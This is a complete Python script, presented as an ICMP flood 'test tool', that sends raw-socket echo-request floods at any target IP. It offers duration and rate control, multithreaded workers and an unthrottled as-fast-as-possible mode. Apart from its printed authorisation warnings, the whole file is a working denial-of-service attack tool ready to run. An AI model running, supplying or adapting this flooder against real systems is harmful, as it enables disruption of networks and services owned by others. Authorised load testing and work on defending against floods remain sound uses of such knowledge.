#!/usr/bin/env python3 """ ICMP Flood Test Tool with Duration Control ONLY USE ON SERVERS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST """ import os import sys import socket import struct import time import random import threading from argparse import ArgumentParser # Calculate ICMP checksum def checksum(source_string): sum = 0 count_to = (len(source_string) // 2) * 2 count = 0 while count < count_to: this_val = source_string[count + 1] * 256 + source_string[count] sum = sum + this_val sum = sum & 0xffffffff count = count + 2 if count_to < len(source_string): sum = sum + source_string[len(source_string) - 1] sum = sum & 0xffffffff sum = (sum >> 16) + (sum & 0xffff) sum = sum + (sum >> 16) answer = ~sum answer = answer & 0xffff answer = answer >> 8 | (answer << 8 & 0xff00) return answer # Create ICMP packet def create_packet(id, data_size=192): """Create ICMP echo request packet""" # ICMP header: type (8), code (0), checksum (0), id (2 bytes), sequence (2 bytes) header = struct.pack('!BBHHH', 8, 0, 0, id, 1) # Payload with random data payload = [] for i in range(data_size): payload.append(random.randint(0, 255)) data = bytes(payload) # Calculate checksum chksum = checksum(header + data) # Repack with correct checksum header = struct.pack('!BBHHH', 8, 0, chksum, id, 1) return header + data # Duration-based flood function def flood_with_duration(dest_ip, duration=30, delay=0, data_size=192, max_pps=1000, timeout=2): """Send ICMP flood for specified duration""" try: # Create raw socket (requires root privileges) sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) sock.settimeout(timeout) except PermissionError: print("Error: Root privileges required for raw sockets") sys.exit(1) sent_packets = 0 start_time = time.time() end_time = start_time + duration print(f"Starting ICMP flood to {dest_ip}") print(f"Duration: {duration} seconds, Max rate: {max_pps} pps") print(f"Data size: {data_size} bytes, Delay: {delay}s") print("Press Ctrl+C to stop early") print("-" * 50) last_print = start_time packets_since_print = 0 try: while time.time() < end_time: # Create packet with random ID packet_id = random.randint(0, 65535) packet = create_packet(packet_id, data_size) # Send packet sock.sendto(packet, (dest_ip, 1)) sent_packets += 1 packets_since_print += 1 current_time = time.time() # Print progress every second if current_time - last_print >= 1.0: elapsed = current_time - start_time remaining = end_time - current_time current_rate = packets_since_print / (current_time - last_print) avg_rate = sent_packets / elapsed if elapsed > 0 else 0 print(f"Elapsed: {elapsed:5.1f}s | " f"Remaining: {remaining:5.1f}s | " f"Packets: {sent_packets:6d} | " f"Rate: {current_rate:6.1f} pps (avg: {avg_rate:6.1f} pps)") last_print = current_time packets_since_print = 0 # Rate limiting logic if delay > 0: # Fixed delay between packets time.sleep(delay) elif max_pps > 0: # Dynamic rate limiting based on max packets per second min_interval = 1.0 / max_pps time.sleep(min_interval) # If both delay=0 and max_pps=0, send as fast as possible except KeyboardInterrupt: print("\nStopped by user") except socket.error as e: print(f"Socket error: {e}") except Exception as e: print(f"Unexpected error: {e}") finally: sock.close() total_time = time.time() - start_time print("\n" + "=" * 60) print("FLOOD TEST COMPLETED") print("=" * 60) print(f"Target: {dest_ip}") print(f"Duration requested: {duration} seconds") print(f"Actual duration: {total_time:.2f} seconds") print(f"Total packets sent: {sent_packets}") print(f"Total bytes sent: {sent_packets * (data_size + 8)}") print(f"Average rate: {sent_packets/total_time:.1f} packets/second") print(f"Average bitrate: {(sent_packets * (data_size + 8) * 8) / total_time / 1000:.1f} kbps") # Multi-threaded duration-based flood def threaded_duration_flood(dest_ip, duration=30, threads=5, data_size=192, max_pps=1000): """Multi-threaded duration-based ICMP flood""" sent_packets = [0] * threads # Thread-safe packet counter running = True def worker(thread_id, end_time): """Worker function for each thread""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) thread_pps = max_pps // threads if max_pps > 0 else 0 min_interval = 1.0 / thread_pps if thread_pps > 0 else 0 while running and time.time() < end_time: packet_id = random.randint(0, 65535) packet = create_packet(packet_id, data_size) sock.sendto(packet, (dest_ip, 1)) sent_packets[thread_id] += 1 if min_interval > 0: time.sleep(min_interval) except Exception as e: print(f"Thread {thread_id} error: {e}") finally: try: sock.close() except: pass start_time = time.time() end_time = start_time + duration thread_list = [] print(f"Starting multi-threaded ICMP flood to {dest_ip}") print(f"Duration: {duration} seconds, Threads: {threads}") print(f"Data size: {data_size} bytes, Max PPS: {max_pps}") print("Press Ctrl+C to stop early") print("-" * 50) # Start worker threads for i in range(threads): thread = threading.Thread(target=worker, args=(i, end_time)) thread.daemon = True thread_list.append(thread) thread.start() # Progress monitoring in main thread last_print = start_time try: while time.time() < end_time: current_time = time.time() if current_time - last_print >= 1.0: elapsed = current_time - start_time remaining = end_time - current_time total_sent = sum(sent_packets) current_rate = total_sent / elapsed if elapsed > 0 else 0 print(f"Elapsed: {elapsed:5.1f}s | " f"Remaining: {remaining:5.1f}s | " f"Packets: {total_sent:6d} | " f"Rate: {current_rate:6.1f} pps | " f"Threads: {threads}") last_print = current_time time.sleep(0.1) # Small sleep to reduce CPU usage except KeyboardInterrupt: print("\nStopping threads...") running = False # Wait for all threads to finish for thread in thread_list: thread.join(timeout=1.0) total_time = time.time() - start_time total_packets = sum(sent_packets) print("\n" + "=" * 60) print("MULTI-THREADED FLOOD TEST COMPLETED") print("=" * 60) print(f"Target: {dest_ip}") print(f"Duration requested: {duration} seconds") print(f"Actual duration: {total_time:.2f} seconds") print(f"Threads used: {threads}") print(f"Total packets sent: {total_packets}") print(f"Total bytes sent: {total_packets * (data_size + 8)}") print(f"Average rate: {total_packets/total_time:.1f} packets/second") print(f"Average bitrate: {(total_packets * (data_size + 8) * 8) / total_time / 1000:.1f} kbps") # Show per-thread statistics print("\nPer-thread statistics:") for i, count in enumerate(sent_packets): print(f" Thread {i}: {count} packets") # Original packet-count based function (for compatibility) def send_icmp_flood(dest_ip, packet_count=1000, delay=0, data_size=192, timeout=2): """Send ICMP flood with packet count (original function)""" try: sock = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) sock.settimeout(timeout) except PermissionError: print("Error: Root privileges required for raw sockets") sys.exit(1) sent_packets = 0 start_time = time.time() print(f"Starting ICMP flood to {dest_ip}") print(f"Packets: {packet_count}, Delay: {delay}s, Data size: {data_size} bytes") try: for i in range(packet_count): packet_id = random.randint(0, 65535) packet = create_packet(packet_id, data_size) sock.sendto(packet, (dest_ip, 1)) sent_packets += 1 # Progress indicator if i % 100 == 0: elapsed = time.time() - start_time rate = i / elapsed if elapsed > 0 else 0 print(f"Sent {i}/{packet_count} packets ({rate:.1f} pkt/s)") if delay > 0: time.sleep(delay) except KeyboardInterrupt: print("\nStopped by user") except Exception as e: print(f"Error: {e}") finally: sock.close() total_time = time.time() - start_time print(f"\nCompleted: {sent_packets} packets sent in {total_time:.2f} seconds") print(f"Average rate: {sent_packets/total_time:.1f} packets/second") def main(): parser = ArgumentParser(description='ICMP Flood Test Tool with Duration Control') parser.add_argument('target', help='Target IP address') # Duration-based arguments parser.add_argument('--duration', type=int, default=30, help='Duration in seconds (default: 30)') parser.add_argument('--max-pps', type=int, default=1000, help='Maximum packets per second (default: 1000)') # Threading arguments parser.add_argument('--threads', type=int, default=1, help='Number of threads (default: 1)') # Packet configuration arguments parser.add_argument('--size', type=int, default=192, help='Data payload size in bytes (default: 192)') parser.add_argument('--delay', type=float, default=0, help='Delay between packets in seconds (overrides max-pps)') # Legacy packet-count arguments parser.add_argument('-c', '--count', type=int, default=None, help='Number of packets to send (legacy, use --duration instead)') args = parser.parse_args() # Warning message print("=" * 70) print("ICMP FLOOD TEST TOOL - DURATION CONTROL") print("ONLY USE ON SERVERS YOU OWN OR HAVE EXPLICIT PERMISSION TO TEST") print("UNAUTHORIZED USE MAY BE ILLEGAL") print("=" * 70) if os.geteuid() != 0: print("Warning: Root privileges recommended for raw sockets") print("Run with: sudo python3 script.py ") print() # Choose execution mode if args.count is not None: # Legacy packet-count mode print("Using legacy packet-count mode (consider using --duration instead)") send_icmp_flood(args.target, args.count, args.delay, args.size) elif args.threads > 1: # Multi-threaded duration mode threaded_duration_flood(args.target, args.duration, args.threads, args.size, args.max_pps) else: # Single-threaded duration mode flood_with_duration(args.target, args.duration, args.delay, args.size, args.max_pps) if __name__ == '__main__': main()